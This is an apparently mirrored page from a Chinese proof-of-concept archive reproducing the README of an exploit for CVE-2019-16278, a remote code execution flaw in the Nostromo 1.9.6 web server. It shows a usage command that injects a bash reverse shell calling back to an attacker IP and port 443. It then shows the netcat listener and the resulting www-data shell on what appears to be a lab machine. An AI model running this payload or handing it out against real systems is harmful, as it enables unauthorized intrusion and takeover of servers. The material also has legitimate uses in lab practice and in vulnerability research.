关联漏洞
描述
This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.
介绍
# CVE-2019-16278-Nostromo-1.9.6-RCE
This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.
# Requirements
optparse
socat
sys
# Usage
You can use the exploit as follows:
```bash
python3 CVE-2019-16278.py --ip=10.129.192.225 --port=80 --command="bash -c 'bash -i >& /dev/tcp/10.10.16.42/443 0>&1'"
b'HTTP/1.1 200 OK\r\nDate: Thu, 04 May 2023 22:05:36 GMT\r\nServer: nostromo 1.9.6\r\nConnection: close\r\n\r\n\r\n'
nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.42] from (UNKNOWN) [10.129.192.225] 40752
bash: cannot set terminal process group (1005): Inappropriate ioctl for device
bash: no job control in this shell
www-data@traverxec:/usr/bin$ whoami
whoami
www-data
www-data@traverxec:/usr/bin$
```
Luck Hacking!!!
文件快照
[4.0K] /data/pocs/19fd0d5b3163f1fd05eb930d9aaade4746ed61da
├── [1.5K] CVE-2019-16278.py
└── [ 784] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。